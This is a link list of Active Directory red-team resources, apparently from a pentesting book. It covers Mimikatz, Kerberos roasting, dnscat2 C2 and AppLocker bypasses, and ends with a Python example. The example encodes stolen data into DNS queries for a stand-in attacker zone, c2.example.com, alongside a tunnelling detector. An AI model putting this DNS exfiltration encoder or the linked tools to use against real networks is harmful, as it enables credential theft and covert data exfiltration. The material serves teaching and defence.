Link encyclopedia

Last updated 7 years ago

Going to try to keep this updated.

Microsoft

  • Powershell 101

Powershell

  • Learn Windows PowerShell in a Month of Lunches (Youtube) - Companion videos to the famous book

  • p3nt4/PowerShdll - Run PowerShell with DLLs only. Does not require access to powershell.exe, because it hosts the PowerShell automation DLL (System.Management.Automation) itself.

  • nullbind/Powershellery - Get-SPN and other things

Empire

  • Empire 101 - Empire introduction from the official documentation

Powerview

  • Powerview repository - contains documentation and how to use PowerView

  • PowerView-3.0-tricks.ps1 - PowerView tips and tricks from HarmJ0y

Bloodhound

  • Bloodhound node info - BloodHound node info explanations

  • Lay of the land with bloodhound - General BloodHound usage guide article

Mimikatz

  • Lazykats - Mass Mimikatz with AV bypass (questionable)

  • Direct link to Invoke-Mimikatz.ps1

  • Auto dumping domain credentials

  • eladshamir/Internal-Monologue - Internal Monologue Attack: retrieving NTLM hashes without touching LSASS

Enumeration

  • Invoke-Portscan.ps1 - Invoke-Portscan is a module from PowerSploit that performs port scans similar to Nmap straight from PowerShell.

  • Walking back local admins - Finding local admins in AD

Kerberos

  • HarmJ0y - roasting-as-reps - Article about Kerberos preauthentication and AS-REP roasting

  • HarmJ0y/ASREPRoast - Project that retrieves crackable hashes from KRB5 AS-REP responses for users that do not have Kerberos preauthentication enabled.

Tunneling

  • SShuttle - sshuttle creates an SSH tunnel that works almost like a VPN

Command and control (C2)

  • SANS Pentest Blog - Using Amazon AWS EC2 for C2

  • lukebaggett/dnscat2-powershell - PowerShell implementation of the dnscat2 client

  • C2 with dnscat2 and powershell - dnscat2 can be used with PowerShell to carry C2 traffic over DNS and hide it in ordinary resolver traffic

  • DNS tunneling - How DNS tunneling works

Exploit

  • SharpShooter - SharpShooter can create payloads in many formats, such as HTA, JS and VBS

  • DCShadow - DCShadow, attack technique that registers a rogue domain controller and pushes changes into AD through replication

Mail

  • Ruler - Ruler can interact with Exchange servers remotely

Breaking out of locked down environments

  • Breaking Out of Citrix and other Restricted Desktop Environments

  • Applocker Case study - Breaking out of AppLocker using advanced techniques

  • Bypass Applocker - List of the most known AppLocker bypass techniques

  • Babushka Dolls or How To Bypass Application Whitelisting and Constrained Powershell

Defense

  • MS - Securing privileged access - Reference material for securing admin access in AD

  • MS - What is AD Red Forest - Red forest design: building an administrative AD environment with security in mind

  • Managing Applocker with Powershell

  • SANS - Finding Empire C2 activity

Lab building

  • The Eye - Official MSDN ISOs for all OSes

  • Automatedlab/Automatedlab - AutomatedLab is a project for building a lab environment automatically using PowerShell.

  • Building a lab with ESXI and Vagrant - Big article from this book about building a lab using ESXi

  • Mini lab - Small article from this book about creating a small lab for practicing things like Responder

Other

  • OSCP Survival Guide archived - contains a ton of useful commands for enumeration and exploitation
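The DNS tunneling entries under Command and control (C2) above (the dnscat2 client, "C2 with dnscat2 and powershell" and "How DNS tunneling works") only link out; the following is an added example, not code from this book or from the dnscat2 project, showing the mechanism both links rely on and the check a defender would run against it. It assumes an attacker-controlled placeholder zone, c2.example.com, whose authoritative server sees every query the victim's resolver forwards; the scoring thresholds in score_query are illustrative values, not tuned numbers.

```python
"""DNS tunnelling, client and server side, plus a crude detector.

Added example (not DarthSidious or dnscat2 code). Assumptions: the attacker
controls the placeholder zone c2.example.com and sees every query for it at
the authoritative server; the victim's resolver simply forwards. The
thresholds in score_query are illustrative, not tuned for production.
"""
import base64
import math
from collections import Counter

ZONE = "c2.example.com"  # assumption: attacker-controlled authoritative zone
MAX_LABEL = 63           # RFC 1035: one label is at most 63 octets
MAX_NAME = 253           # RFC 1035: a name in text form is at most 253 chars
LABELS_PER_NAME = 3      # 4 + 1 + 3*(63 + 1) + len(ZONE) = 211 <= MAX_NAME


def encode_chunks(data: bytes, zone: str = ZONE) -> list:
    """Client side: turn data into query names <seq>.<b32>.<b32>.<b32>.<zone>.

    base32 is used because DNS names are case-insensitive and only letters,
    digits and '-' are safe in a hostname. Padding is stripped ('=' is not a
    valid hostname character) and restored on decode.
    """
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for seq, i in enumerate(range(0, len(labels), LABELS_PER_NAME)):
        # sequence number first: caches and resolvers may reorder queries
        name = f"{seq:04x}." + ".".join(labels[i:i + LABELS_PER_NAME]) + "." + zone
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_chunks(names, zone: str = ZONE) -> bytes:
    """Server side: keep names under the zone, reorder by seq, reassemble."""
    suffix = "." + zone
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue  # unrelated query, ignore
        seq, _, payload = name[:-len(suffix)].partition(".")
        parts[int(seq, 16)] = payload.replace(".", "")
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)  # restore base32 padding
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_query(name: str, long_label: int = 30, min_entropy: float = 3.5,
                long_payload: int = 100) -> float:
    """Defender side: crude tunnelling score for a single query name.

    Strips the last two labels as the registrable domain (assumption: no
    public-suffix list here) and scores the rest on longest label, entropy
    and total length. Real tunnels also stand out by query volume per zone
    and by TXT/NULL record types, which one name alone cannot show.
    """
    sub = name.rstrip(".").split(".")[:-2]
    if not sub:
        return 0.0
    payload = "".join(sub)
    score = 0.0
    if max(len(label) for label in sub) >= long_label:
        score += 1.0
    if shannon_entropy(payload) >= min_entropy:
        score += 1.0
    if len(payload) >= long_payload:
        score += 1.0
    return score


if __name__ == "__main__":
    secret = b"NTLM hash dump goes here: " + bytes(range(256))  # constructed sample
    queries = encode_chunks(secret)
    print(f"{len(secret)} bytes -> {len(queries)} queries, e.g. {queries[0][:60]}...")
    assert decode_chunks(reversed(queries)) == secret
    for q in queries[:1] + ["www.microsoft.com", "mail.example.com"]:
        print(f"{score_query(q):.0f}  {q[:50]}")
```

Run as a script it encodes a constructed sample, decodes it from shuffled order and scores one tunnel name against two ordinary hostnames. dnscat2 adds its own session framing, the downstream direction (server data encoded into TXT/CNAME/MX answers) and optional encryption on top of this idea; the detector's thresholds should be replaced by per-zone query counts and record-type ratios from your own resolver logs before being trusted.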